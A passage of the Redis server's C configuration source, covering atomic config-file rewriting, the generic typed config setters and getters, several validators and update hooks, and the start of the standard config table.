if (tmp_path_len <= 0 || (unsigned int)tmp_path_len >= sizeof(tmp_conffile)) {
serverLog(LL_WARNING, "Config file full path is too long");
errno = ENAMETOOLONG;
return retval;
}
#ifdef _GNU_SOURCE
fd = mkostemp(tmp_conffile, O_CLOEXEC);
#else
/* There's a theoretical chance here to leak the FD if a module thread forks & execv in the middle */
fd = mkstemp(tmp_conffile);
#endif
if (fd == -1) {
serverLog(LL_WARNING, "Could not create tmp config file (%s)", strerror(errno));
return retval;
}
while (offset < sdslen(content)) {
written_bytes = write(fd, content + offset, sdslen(content) - offset);
if (written_bytes <= 0) {
if (errno == EINTR) continue; /* FD is blocking, no other retryable errors */
serverLog(LL_WARNING, "Failed after writing (%zd) bytes to tmp config file (%s)", offset, strerror(errno));
goto cleanup;
}
offset+=written_bytes;
}
if (fsync(fd))
serverLog(LL_WARNING, "Could not sync tmp config file to disk (%s)", strerror(errno));
else if (fchmod(fd, 0644 & ~server.umask) == -1)
serverLog(LL_WARNING, "Could not chmod config file (%s)", strerror(errno));
else if (rename(tmp_conffile, configfile) == -1)
serverLog(LL_WARNING, "Could not rename tmp config file (%s)", strerror(errno));
else {
retval = 0;
serverLog(LL_DEBUG, "Rewritten config file (%s) successfully", configfile);
}
cleanup:
close(fd);
if (retval) unlink(tmp_conffile);
return retval;
}
/* Rewrite the configuration file at "path".
* If the configuration file already exists, we try at best to retain comments
* and overall structure.
*
* Configuration parameters that are at their default value, unless already
* explicitly included in the old configuration file, are not rewritten.
* The force_all flag overrides this behavior and forces everything to be
* written. This is currently only used for testing purposes.
*
* On error -1 is returned and errno is set accordingly, otherwise 0. */
int rewriteConfig(char *path, int force_all) {
struct rewriteConfigState *state;
sds newcontent;
int retval;
/* Step 1: read the old config into our rewrite state. */
if ((state = rewriteConfigReadOldFile(path)) == NULL) return -1;
if (force_all) state->force_all = 1;
/* Step 2: rewrite every single option, replacing or appending it inside
* the rewrite state. */
/* Iterate the configs that are standard */
for (standardConfig *config = configs; config->name != NULL; config++) {
config->interface.rewrite(config->data, config->name, state);
}
rewriteConfigBindOption(state);
rewriteConfigOctalOption(state,"unixsocketperm",server.unixsocketperm,CONFIG_DEFAULT_UNIX_SOCKET_PERM);
rewriteConfigStringOption(state,"logfile",server.logfile,CONFIG_DEFAULT_LOGFILE);
rewriteConfigSaveOption(state);
rewriteConfigUserOption(state);
rewriteConfigDirOption(state);
rewriteConfigSlaveofOption(state,"replicaof");
rewriteConfigRequirepassOption(state,"requirepass");
rewriteConfigBytesOption(state,"client-query-buffer-limit",server.client_max_querybuf_len,PROTO_MAX_QUERYBUF_LEN);
rewriteConfigStringOption(state,"cluster-config-file",server.cluster_configfile,CONFIG_DEFAULT_CLUSTER_CONFIG_FILE);
rewriteConfigNotifykeyspaceeventsOption(state);
rewriteConfigClientoutputbufferlimitOption(state);
rewriteConfigOOMScoreAdjValuesOption(state);
/* Rewrite Sentinel config if in Sentinel mode. */
if (server.sentinel_mode) rewriteConfigSentinelOption(state);
/* Step 3: remove all the orphaned lines in the old file, that is, lines
* that were used by a config option and are no longer used, like in case
* of multiple "save" options or duplicated options. */
rewriteConfigRemoveOrphaned(state);
/* Step 4: generate a new configuration file from the modified state
* and write it into the original file. */
newcontent = rewriteConfigGetContentFromState(state);
retval = rewriteConfigOverwriteFile(server.configfile,newcontent);
sdsfree(newcontent);
rewriteConfigReleaseState(state);
return retval;
}
/*-----------------------------------------------------------------------------
* Configs that fit one of the major types and require no special handling
*----------------------------------------------------------------------------*/
#define LOADBUF_SIZE 256
static char loadbuf[LOADBUF_SIZE];
#define MODIFIABLE_CONFIG 1
#define IMMUTABLE_CONFIG 0
#define embedCommonConfig(config_name, config_alias, is_modifiable) \
.name = (config_name), \
.alias = (config_alias), \
.modifiable = (is_modifiable),
#define embedConfigInterface(initfn, setfn, getfn, rewritefn) .interface = { \
.init = (initfn), \
.set = (setfn), \
.get = (getfn), \
.rewrite = (rewritefn) \
},
/* What follows is the generic config types that are supported. To add a new
* config with one of these types, add it to the standardConfig table with
* the creation macro for each type.
*
* Each type contains the following:
* * A function defining how to load this type on startup.
* * A function defining how to update this type on CONFIG SET.
* * A function defining how to serialize this type on CONFIG SET.
* * A function defining how to rewrite this type on CONFIG REWRITE.
* * A Macro defining how to create this type.
*/
/* Bool Configs */
static void boolConfigInit(typeData data) {
*data.yesno.config = data.yesno.default_value;
}
static int boolConfigSet(typeData data, sds value, int update, char **err) {
int yn = yesnotoi(value);
if (yn == -1) {
*err = "argument must be 'yes' or 'no'";
return 0;
}
if (data.yesno.is_valid_fn && !data.yesno.is_valid_fn(yn, err))
return 0;
int prev = *(data.yesno.config);
*(data.yesno.config) = yn;
if (update && data.yesno.update_fn && !data.yesno.update_fn(yn, prev, err)) {
*(data.yesno.config) = prev;
return 0;
}
return 1;
}
static void boolConfigGet(client *c, typeData data) {
addReplyBulkCString(c, *data.yesno.config ? "yes" : "no");
}
static void boolConfigRewrite(typeData data, const char *name, struct rewriteConfigState *state) {
rewriteConfigYesNoOption(state, name,*(data.yesno.config), data.yesno.default_value);
}
#define createBoolConfig(name, alias, modifiable, config_addr, default, is_valid, update) { \
embedCommonConfig(name, alias, modifiable) \
embedConfigInterface(boolConfigInit, boolConfigSet, boolConfigGet, boolConfigRewrite) \
.data.yesno = { \
.config = &(config_addr), \
.default_value = (default), \
.is_valid_fn = (is_valid), \
.update_fn = (update), \
} \
}
/* String Configs */
static void stringConfigInit(typeData data) {
if (data.string.convert_empty_to_null) {
*data.string.config = data.string.default_value ? zstrdup(data.string.default_value) : NULL;
} else {
*data.string.config = zstrdup(data.string.default_value);
}
}
static int stringConfigSet(typeData data, sds value, int update, char **err) {
if (data.string.is_valid_fn && !data.string.is_valid_fn(value, err))
return 0;
char *prev = *data.string.config;
if (data.string.convert_empty_to_null) {
*data.string.config = value[0] ? zstrdup(value) : NULL;
} else {
*data.string.config = zstrdup(value);
}
if (update && data.string.update_fn && !data.string.update_fn(*data.string.config, prev, err)) {
zfree(*data.string.config);
*data.string.config = prev;
return 0;
}
zfree(prev);
return 1;
}
static void stringConfigGet(client *c, typeData data) {
addReplyBulkCString(c, *data.string.config ? *data.string.config : "");
}
static void stringConfigRewrite(typeData data, const char *name, struct rewriteConfigState *state) {
rewriteConfigStringOption(state, name,*(data.string.config), data.string.default_value);
}
#define ALLOW_EMPTY_STRING 0
#define EMPTY_STRING_IS_NULL 1
#define createStringConfig(name, alias, modifiable, empty_to_null, config_addr, default, is_valid, update) { \
embedCommonConfig(name, alias, modifiable) \
embedConfigInterface(stringConfigInit, stringConfigSet, stringConfigGet, stringConfigRewrite) \
.data.string = { \
.config = &(config_addr), \
.default_value = (default), \
.is_valid_fn = (is_valid), \
.update_fn = (update), \
.convert_empty_to_null = (empty_to_null), \
} \
}
/* Enum configs */
static void enumConfigInit(typeData data) {
*data.enumd.config = data.enumd.default_value;
}
static int enumConfigSet(typeData data, sds value, int update, char **err) {
int enumval = configEnumGetValue(data.enumd.enum_value, value);
if (enumval == INT_MIN) {
sds enumerr = sdsnew("argument must be one of the following: ");
configEnum *enumNode = data.enumd.enum_value;
while(enumNode->name != NULL) {
enumerr = sdscatlen(enumerr, enumNode->name,
strlen(enumNode->name));
enumerr = sdscatlen(enumerr, ", ", 2);
enumNode++;
}
sdsrange(enumerr,0,-3); /* Remove final ", ". */
strncpy(loadbuf, enumerr, LOADBUF_SIZE);
loadbuf[LOADBUF_SIZE - 1] = '\0';
sdsfree(enumerr);
*err = loadbuf;
return 0;
}
if (data.enumd.is_valid_fn && !data.enumd.is_valid_fn(enumval, err))
return 0;
int prev = *(data.enumd.config);
*(data.enumd.config) = enumval;
if (update && data.enumd.update_fn && !data.enumd.update_fn(enumval, prev, err)) {
*(data.enumd.config) = prev;
return 0;
}
return 1;
}
static void enumConfigGet(client *c, typeData data) {
addReplyBulkCString(c, configEnumGetNameOrUnknown(data.enumd.enum_value,*data.enumd.config));
}
static void enumConfigRewrite(typeData data, const char *name, struct rewriteConfigState *state) {
rewriteConfigEnumOption(state, name,*(data.enumd.config), data.enumd.enum_value, data.enumd.default_value);
}
#define createEnumConfig(name, alias, modifiable, enum, config_addr, default, is_valid, update) { \
embedCommonConfig(name, alias, modifiable) \
embedConfigInterface(enumConfigInit, enumConfigSet, enumConfigGet, enumConfigRewrite) \
.data.enumd = { \
.config = &(config_addr), \
.default_value = (default), \
.is_valid_fn = (is_valid), \
.update_fn = (update), \
.enum_value = (enum), \
} \
}
/* Gets a 'long long val' and sets it into the union, using a macro to get
* compile time type check. */
#define SET_NUMERIC_TYPE(val) \
if (data.numeric.numeric_type == NUMERIC_TYPE_INT) { \
*(data.numeric.config.i) = (int) val; \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_UINT) { \
*(data.numeric.config.ui) = (unsigned int) val; \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_LONG) { \
*(data.numeric.config.l) = (long) val; \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_ULONG) { \
*(data.numeric.config.ul) = (unsigned long) val; \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_LONG_LONG) { \
*(data.numeric.config.ll) = (long long) val; \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_ULONG_LONG) { \
*(data.numeric.config.ull) = (unsigned long long) val; \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_SIZE_T) { \
*(data.numeric.config.st) = (size_t) val; \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_SSIZE_T) { \
*(data.numeric.config.sst) = (ssize_t) val; \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_OFF_T) { \
*(data.numeric.config.ot) = (off_t) val; \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_TIME_T) { \
*(data.numeric.config.tt) = (time_t) val; \
}
/* Gets a 'long long val' and sets it with the value from the union, using a
* macro to get compile time type check. */
#define GET_NUMERIC_TYPE(val) \
if (data.numeric.numeric_type == NUMERIC_TYPE_INT) { \
val = *(data.numeric.config.i); \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_UINT) { \
val = *(data.numeric.config.ui); \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_LONG) { \
val = *(data.numeric.config.l); \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_ULONG) { \
val = *(data.numeric.config.ul); \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_LONG_LONG) { \
val = *(data.numeric.config.ll); \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_ULONG_LONG) { \
val = *(data.numeric.config.ull); \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_SIZE_T) { \
val = *(data.numeric.config.st); \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_SSIZE_T) { \
val = *(data.numeric.config.sst); \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_OFF_T) { \
val = *(data.numeric.config.ot); \
} else if (data.numeric.numeric_type == NUMERIC_TYPE_TIME_T) { \
val = *(data.numeric.config.tt); \
}
/* Numeric configs */
static void numericConfigInit(typeData data) {
SET_NUMERIC_TYPE(data.numeric.default_value)
}
static int numericBoundaryCheck(typeData data, long long ll, char **err) {
if (data.numeric.numeric_type == NUMERIC_TYPE_ULONG_LONG ||
data.numeric.numeric_type == NUMERIC_TYPE_UINT ||
data.numeric.numeric_type == NUMERIC_TYPE_SIZE_T) {
/* Boundary check for unsigned types */
unsigned long long ull = ll;
unsigned long long upper_bound = data.numeric.upper_bound;
unsigned long long lower_bound = data.numeric.lower_bound;
if (ull > upper_bound || ull < lower_bound) {
snprintf(loadbuf, LOADBUF_SIZE,
"argument must be between %llu and %llu inclusive",
lower_bound,
upper_bound);
*err = loadbuf;
return 0;
}
} else {
/* Boundary check for signed types */
if (ll > data.numeric.upper_bound || ll < data.numeric.lower_bound) {
snprintf(loadbuf, LOADBUF_SIZE,
"argument must be between %lld and %lld inclusive",
data.numeric.lower_bound,
data.numeric.upper_bound);
*err = loadbuf;
return 0;
}
}
return 1;
}
static int numericConfigSet(typeData data, sds value, int update, char **err) {
long long ll, prev = 0;
if (data.numeric.is_memory) {
int memerr;
ll = memtoll(value, &memerr);
if (memerr || ll < 0) {
*err = "argument must be a memory value";
return 0;
}
} else {
if (!string2ll(value, sdslen(value),&ll)) {
*err = "argument couldn't be parsed into an integer" ;
return 0;
}
}
if (!numericBoundaryCheck(data, ll, err))
return 0;
if (data.numeric.is_valid_fn && !data.numeric.is_valid_fn(ll, err))
return 0;
GET_NUMERIC_TYPE(prev)
SET_NUMERIC_TYPE(ll)
if (update && data.numeric.update_fn && !data.numeric.update_fn(ll, prev, err)) {
SET_NUMERIC_TYPE(prev)
return 0;
}
return 1;
}
static void numericConfigGet(client *c, typeData data) {
char buf[128];
long long value = 0;
GET_NUMERIC_TYPE(value)
ll2string(buf, sizeof(buf), value);
addReplyBulkCString(c, buf);
}
static void numericConfigRewrite(typeData data, const char *name, struct rewriteConfigState *state) {
long long value = 0;
GET_NUMERIC_TYPE(value)
if (data.numeric.is_memory) {
rewriteConfigBytesOption(state, name, value, data.numeric.default_value);
} else {
rewriteConfigNumericalOption(state, name, value, data.numeric.default_value);
}
}
#define INTEGER_CONFIG 0
#define MEMORY_CONFIG 1
#define embedCommonNumericalConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) { \
embedCommonConfig(name, alias, modifiable) \
embedConfigInterface(numericConfigInit, numericConfigSet, numericConfigGet, numericConfigRewrite) \
.data.numeric = { \
.lower_bound = (lower), \
.upper_bound = (upper), \
.default_value = (default), \
.is_valid_fn = (is_valid), \
.update_fn = (update), \
.is_memory = (memory),
#define createIntConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
embedCommonNumericalConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
.numeric_type = NUMERIC_TYPE_INT, \
.config.i = &(config_addr) \
} \
}
#define createUIntConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
embedCommonNumericalConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
.numeric_type = NUMERIC_TYPE_UINT, \
.config.ui = &(config_addr) \
} \
}
#define createLongConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
embedCommonNumericalConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
.numeric_type = NUMERIC_TYPE_LONG, \
.config.l = &(config_addr) \
} \
}
#define createULongConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
embedCommonNumericalConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
.numeric_type = NUMERIC_TYPE_ULONG, \
.config.ul = &(config_addr) \
} \
}
#define createLongLongConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
embedCommonNumericalConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
.numeric_type = NUMERIC_TYPE_LONG_LONG, \
.config.ll = &(config_addr) \
} \
}
#define createULongLongConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
embedCommonNumericalConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
.numeric_type = NUMERIC_TYPE_ULONG_LONG, \
.config.ull = &(config_addr) \
} \
}
#define createSizeTConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
embedCommonNumericalConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
.numeric_type = NUMERIC_TYPE_SIZE_T, \
.config.st = &(config_addr) \
} \
}
#define createSSizeTConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
embedCommonNumericalConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
.numeric_type = NUMERIC_TYPE_SSIZE_T, \
.config.sst = &(config_addr) \
} \
}
#define createTimeTConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
embedCommonNumericalConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
.numeric_type = NUMERIC_TYPE_TIME_T, \
.config.tt = &(config_addr) \
} \
}
#define createOffTConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
embedCommonNumericalConfig(name, alias, modifiable, lower, upper, config_addr, default, memory, is_valid, update) \
.numeric_type = NUMERIC_TYPE_OFF_T, \
.config.ot = &(config_addr) \
} \
}
static int isValidActiveDefrag(int val, char **err) {
#ifndef HAVE_DEFRAG
if (val) {
*err = "Active defragmentation cannot be enabled: it "
"requires a Redis server compiled with a modified Jemalloc "
"like the one shipped by default with the Redis source "
"distribution";
return 0;
}
#else
UNUSED(val);
UNUSED(err);
#endif
return 1;
}
static int isValidDBfilename(char *val, char **err) {
if (!pathIsBaseName(val)) {
*err = "dbfilename can't be a path, just a filename";
return 0;
}
return 1;
}
static int isValidAOFfilename(char *val, char **err) {
if (!pathIsBaseName(val)) {
*err = "appendfilename can't be a path, just a filename";
return 0;
}
return 1;
}
static int updateHZ(long long val, long long prev, char **err) {
UNUSED(prev);
UNUSED(err);
/* Hz is more a hint from the user, so we accept values out of range
* but cap them to reasonable values. */
server.config_hz = val;
if (server.config_hz < CONFIG_MIN_HZ) server.config_hz = CONFIG_MIN_HZ;
if (server.config_hz > CONFIG_MAX_HZ) server.config_hz = CONFIG_MAX_HZ;
server.hz = server.config_hz;
return 1;
}
static int updateJemallocBgThread(int val, int prev, char **err) {
UNUSED(prev);
UNUSED(err);
set_jemalloc_bg_thread(val);
return 1;
}
static int updateReplBacklogSize(long long val, long long prev, char **err) {
/* resizeReplicationBacklog sets server.repl_backlog_size, and relies on
* being able to tell when the size changes, so restore prev before calling it. */
UNUSED(err);
server.repl_backlog_size = prev;
resizeReplicationBacklog(val);
return 1;
}
static int updateMaxmemory(long long val, long long prev, char **err) {
UNUSED(prev);
UNUSED(err);
if (val) {
size_t used = zmalloc_used_memory()-freeMemoryGetNotCountedMemory();
if ((unsigned long long)val < used) {
serverLog(LL_WARNING,"WARNING: the new maxmemory value set via CONFIG SET (%llu) is smaller than the current memory usage (%zu). This will result in key eviction and/or the inability to accept new write commands depending on the maxmemory-policy.", server.maxmemory, used);
}
freeMemoryIfNeededAndSafe();
}
return 1;
}
static int updateGoodSlaves(long long val, long long prev, char **err) {
UNUSED(val);
UNUSED(prev);
UNUSED(err);
refreshGoodSlavesCount();
return 1;
}
static int updateAppendonly(int val, int prev, char **err) {
UNUSED(prev);
if (val == 0 && server.aof_state != AOF_OFF) {
stopAppendOnly();
} else if (val && server.aof_state == AOF_OFF) {
if (startAppendOnly() == C_ERR) {
*err = "Unable to turn on AOF. Check server logs.";
return 0;
}
}
return 1;
}
static int updateMaxclients(long long val, long long prev, char **err) {
/* Try to check if the OS is capable of supporting so many FDs. */
if (val > prev) {
adjustOpenFilesLimit();
if (server.maxclients != val) {
static char msg[128];
sprintf(msg, "The operating system is not able to handle the specified number of clients, try with %d", server.maxclients);
*err = msg;
if (server.maxclients > prev) {
server.maxclients = prev;
adjustOpenFilesLimit();
}
return 0;
}
if ((unsigned int) aeGetSetSize(server.el) <
server.maxclients + CONFIG_FDSET_INCR)
{
if (aeResizeSetSize(server.el,
server.maxclients + CONFIG_FDSET_INCR) == AE_ERR)
{
*err = "The event loop API used by Redis is not able to handle the specified number of clients";
return 0;
}
}
}
return 1;
}
static int updateOOMScoreAdj(int val, int prev, char **err) {
UNUSED(prev);
if (val) {
if (setOOMScoreAdj(-1) == C_ERR) {
*err = "Failed to set current oom_score_adj. Check server logs.";
return 0;
}
}
return 1;
}
#ifdef USE_OPENSSL
static int updateTlsCfg(char *val, char *prev, char **err) {
UNUSED(val);
UNUSED(prev);
UNUSED(err);
/* If TLS is enabled, try to configure OpenSSL. */
if ((server.tls_port || server.tls_replication || server.tls_cluster)
&& tlsConfigure(&server.tls_ctx_config) == C_ERR) {
*err = "Unable to update TLS configuration. Check server logs.";
return 0;
}
return 1;
}
static int updateTlsCfgBool(int val, int prev, char **err) {
UNUSED(val);
UNUSED(prev);
return updateTlsCfg(NULL, NULL, err);
}
static int updateTlsCfgInt(long long val, long long prev, char **err) {
UNUSED(val);
UNUSED(prev);
return updateTlsCfg(NULL, NULL, err);
}
#endif /* USE_OPENSSL */
standardConfig configs[] = {
/* Bool configs */
createBoolConfig("rdbchecksum", NULL, IMMUTABLE_CONFIG, server.rdb_checksum, 1, NULL, NULL),
createBoolConfig("daemonize", NULL, IMMUTABLE_CONFIG, server.daemonize, 0, NULL, NULL),
createBoolConfig("io-threads-do-reads", NULL, IMMUTABLE_CONFIG, server.io_threads_do_reads, 0,NULL, NULL), /* Read + parse from threads? */
createBoolConfig("lua-replicate-commands", NULL, MODIFIABLE_CONFIG, server.lua_always_replicate_commands, 1, NULL, NULL),
createBoolConfig("always-show-logo", NULL, IMMUTABLE_CONFIG, server.always_show_logo, 0, NULL, NULL),
createBoolConfig("protected-mode", NULL, MODIFIABLE_CONFIG, server.protected_mode, 1, NULL, NULL),
createBoolConfig("rdbcompression", NULL, MODIFIABLE_CONFIG, server.rdb_compression, 1, NULL, NULL),
createBoolConfig("rdb-del-sync-files", NULL, MODIFIABLE_CONFIG, server.rdb_del_sync_files, 0, NULL, NULL),
createBoolConfig("activerehashing", NULL, MODIFIABLE_CONFIG, server.activerehashing, 1, NULL, NULL),
createBoolConfig("stop-writes-on-bgsave-error", NULL, MODIFIABLE_CONFIG, server.stop_writes_on_bgsave_err, 1, NULL, NULL),
createBoolConfig("dynamic-hz", NULL, MODIFIABLE_CONFIG, server.dynamic_hz, 1, NULL, NULL), /* Adapt hz to # of clients.*/
createBoolConfig("lazyfree-lazy-eviction", NULL, MODIFIABLE_CONFIG, server.lazyfree_lazy_eviction, 0, NULL, NULL),
createBoolConfig("lazyfree-lazy-expire", NULL, MODIFIABLE_CONFIG, server.lazyfree_lazy_expire, 0, NULL, NULL),
createBoolConfig("lazyfree-lazy-server-del", NULL, MODIFIABLE_CONFIG, server.lazyfree_lazy_server_del, 0, NULL, NULL),
createBoolConfig("lazyfree-lazy-user-del", NULL, MODIFIABLE_CONFIG, server.lazyfree_lazy_user_del , 0, NULL, NULL),
createBoolConfig("repl-disable-tcp-nodelay", NULL, MODIFIABLE_CONFIG, server.repl_disable_tcp_nodelay, 0, NULL, NULL),
createBoolConfig("repl-diskless-sync", NULL, MODIFIABLE_CONFIG, server.repl_diskless_sync, 0, NULL, NULL),
createBoolConfig("gopher-enabled", NULL, MODIFIABLE_CONFIG, server.gopher_enabled, 0, NULL, NULL),
createBoolConfig("aof-rewrite-incremental-fsync", NULL, MODIFIABLE_CONFIG, server.aof_rewrite_incremental_fsync, 1, NULL, NULL),
createBoolConfig("no-appendfsync-on-rewrite", NULL, MODIFIABLE_CONFIG, server.aof_no_fsync_on_rewrite, 0, NULL, NULL),
createBoolConfig("cluster-require-full-coverage", NULL, MODIFIABLE_CONFIG, server.cluster_require_full_coverage, 1, NULL, NULL),
createBoolConfig("rdb-save-incremental-fsync", NULL, MODIFIABLE_CONFIG, server.rdb_save_incremental_fsync, 1, NULL, NULL),
createBoolConfig("aof-load-truncated", NULL, MODIFIABLE_CONFIG, server.aof_load_truncated, 1, NULL, NULL),
createBoolConfig("aof-use-rdb-preamble", NULL, MODIFIABLE_CONFIG, server.aof_use_rdb_preamble, 1, NULL, NULL),
createBoolConfig("cluster-replica-no-failover", "cluster-slave-no-failover", MODIFIABLE_CONFIG, server.cluster_slave_no_failover, 0, NULL, NULL), /* Failover by default. */
createBoolConfig("replica-lazy-flush", "slave-lazy-flush", MODIFIABLE_CONFIG, server.repl_slave_lazy_flush, 0, NULL, NULL),
createBoolConfig("replica-serve-stale-data", "slave-serve-stale-data", MODIFIABLE_CONFIG, server.repl_serve_stale_data, 1, NULL, NULL),
createBoolConfig("replica-read-only", "slave-read-only", MODIFIABLE_CONFIG, server.repl_slave_ro, 1, NULL, NULL),
createBoolConfig("replica-ignore-maxmemory", "slave-ignore-maxmemory", MODIFIABLE_CONFIG, server.repl_slave_ignore_maxmemory, 1, NULL, NULL),
createBoolConfig("jemalloc-bg-thread", NULL, MODIFIABLE_CONFIG, server.jemalloc_bg_thread, 1, NULL, updateJemallocBgThread),
createBoolConfig("activedefrag", NULL, MODIFIABLE_CONFIG, server.active_defrag_enabled, 0, isValidActiveDefrag, NULL),
createBoolConfig("syslog-enabled", NULL, IMMUTABLE_CONFIG, server.syslog_enabled, 0, NULL, NULL),
createBoolConfig("cluster-enabled", NULL, IMMUTABLE_CONFIG, server.cluster_enabled, 0, NULL, NULL),
createBoolConfig("appendonly", NULL, MODIFIABLE_CONFIG, server.aof_enabled, 0, NULL, updateAppendonly),
createBoolConfig("cluster-allow-reads-when-down", NULL, MODIFIABLE_CONFIG, server.cluster_allow_reads_when_down, 0, NULL, NULL),
/* String Configs */
createStringConfig("aclfile", NULL, IMMUTABLE_CONFIG, ALLOW_EMPTY_STRING, server.acl_filename, "", NULL, NULL),
createStringConfig("unixsocket", NULL, IMMUTABLE_CONFIG, EMPTY_STRING_IS_NULL, server.unixsocket, NULL, NULL, NULL),
createStringConfig("pidfile", NULL, IMMUTABLE_CONFIG, EMPTY_STRING_IS_NULL, server.pidfile, NULL, NULL, NULL),
createStringConfig("replica-announce-ip", "slave-announce-ip", MODIFIABLE_CONFIG, EMPTY_STRING_IS_NULL, server.slave_announce_ip, NULL, NULL, NULL),
createStringConfig("masteruser", NULL, MODIFIABLE_CONFIG, EMPTY_STRING_IS_NULL, server.masteruser, NULL, NULL, NULL),
createStringConfig("masterauth", NULL, MODIFIABLE_CONFIG, EMPTY_STRING_IS_NULL, server.masterauth, NULL, NULL, NULL),
createStringConfig("cluster-announce-ip", NULL, MODIFIABLE_CONFIG, EMPTY_STRING_IS_NULL, server.cluster_announce_ip, NULL, NULL, NULL),
createStringConfig("syslog-ident", NULL, IMMUTABLE_CONFIG, ALLOW_EMPTY_STRING, server.syslog_ident, "redis", NULL, NULL),
createStringConfig("dbfilename", NULL, MODIFIABLE_CONFIG, ALLOW_EMPTY_STRING, server.rdb_filename, "dump.rdb", isValidDBfilename, NULL),
createStringConfig("appendfilename", NULL, IMMUTABLE_CONFIG, ALLOW_EMPTY_STRING, server.aof_filename, "appendonly.aof", isValidAOFfilename, NULL),
createStringConfig("server_cpulist", NULL, IMMUTABLE_CONFIG, EMPTY_STRING_IS_NULL, server.server_cpulist, NULL, NULL, NULL),
createStringConfig("bio_cpulist", NULL, IMMUTABLE_CONFIG, EMPTY_STRING_IS_NULL, server.bio_cpulist, NULL, NULL, NULL),
createStringConfig("aof_rewrite_cpulist", NULL, IMMUTABLE_CONFIG, EMPTY_STRING_IS_NULL, server.aof_rewrite_cpulist, NULL, NULL, NULL),
createStringConfig("bgsave_cpulist", NULL, IMMUTABLE_CONFIG, EMPTY_STRING_IS_NULL, server.bgsave_cpulist, NULL, NULL, NULL),
createStringConfig("ignore-warnings", NULL, MODIFIABLE_CONFIG, ALLOW_EMPTY_STRING, server.ignore_warnings, "ARM64-COW-BUG", NULL, NULL),
/* Enum Configs */
createEnumConfig("supervised", NULL, IMMUTABLE_CONFIG, supervised_mode_enum, server.supervised_mode, SUPERVISED_NONE, NULL, NULL),
createEnumConfig("syslog-facility", NULL, IMMUTABLE_CONFIG, syslog_facility_enum, server.syslog_facility, LOG_LOCAL0, NULL, NULL),
createEnumConfig("repl-diskless-load", NULL, MODIFIABLE_CONFIG, repl_diskless_load_enum, server.repl_diskless_load, REPL_DISKLESS_LOAD_DISABLED, NULL, NULL),
createEnumConfig("loglevel", NULL, MODIFIABLE_CONFIG, loglevel_enum, server.verbosity, LL_NOTICE, NULL, NULL),
createEnumConfig("maxmemory-policy", NULL, MODIFIABLE_CONFIG, maxmemory_policy_enum, server.maxmemory_policy, MAXMEMORY_NO_EVICTION, NULL, NULL),
createEnumConfig("appendfsync", NULL, MODIFIABLE_CONFIG, aof_fsync_enum, server.aof_fsync, AOF_FSYNC_EVERYSEC, NULL, NULL),
createEnumConfig("oom-score-adj", NULL, MODIFIABLE_CONFIG, oom_score_adj_enum, server.oom_score_adj, OOM_SCORE_ADJ_NO, NULL, updateOOMScoreAdj),
/* Integer configs */
createIntConfig("databases", NULL, IMMUTABLE_CONFIG, 1, INT_MAX, server.dbnum, 16, INTEGER_CONFIG, NULL, NULL),
createIntConfig("port", NULL, IMMUTABLE_CONFIG, 0, 65535, server.port, 6379, INTEGER_CONFIG, NULL, NULL), /* TCP port. */
createIntConfig("io-threads", NULL, IMMUTABLE_CONFIG, 1, 128, server.io_threads_num, 1, INTEGER_CONFIG, NULL, NULL), /* Single threaded by default */
createIntConfig("auto-aof-rewrite-percentage", NULL, MODIFIABLE_CONFIG, 0, INT_MAX, server.aof_rewrite_perc, 100, INTEGER_CONFIG, NULL, NULL),
createIntConfig("cluster-replica-validity-factor", "cluster-slave-validity-factor", MODIFIABLE_CONFIG, 0, INT_MAX, server.cluster_slave_validity_factor, 10, INTEGER_CONFIG, NULL, NULL), /* Slave max data age factor. */
createIntConfig("list-max-ziplist-size", NULL, MODIFIABLE_CONFIG, INT_MIN, INT_MAX, server.list_max_ziplist_size, -2, INTEGER_CONFIG, NULL, NULL),
createIntConfig("tcp-keepalive", NULL, MODIFIABLE_CONFIG, 0, INT_MAX, server.tcpkeepalive, 300, INTEGER_CONFIG, NULL, NULL),
createIntConfig("cluster-migration-barrier", NULL, MODIFIABLE_CONFIG, 0, INT_MAX, server.cluster_migration_barrier, 1, INTEGER_CONFIG, NULL, NULL),
createIntConfig("active-defrag-cycle-min", NULL, MODIFIABLE_CONFIG, 1, 99, server.active_defrag_cycle_min, 1, INTEGER_CONFIG, NULL, NULL), /* Default: 1% CPU min (at lower threshold) */
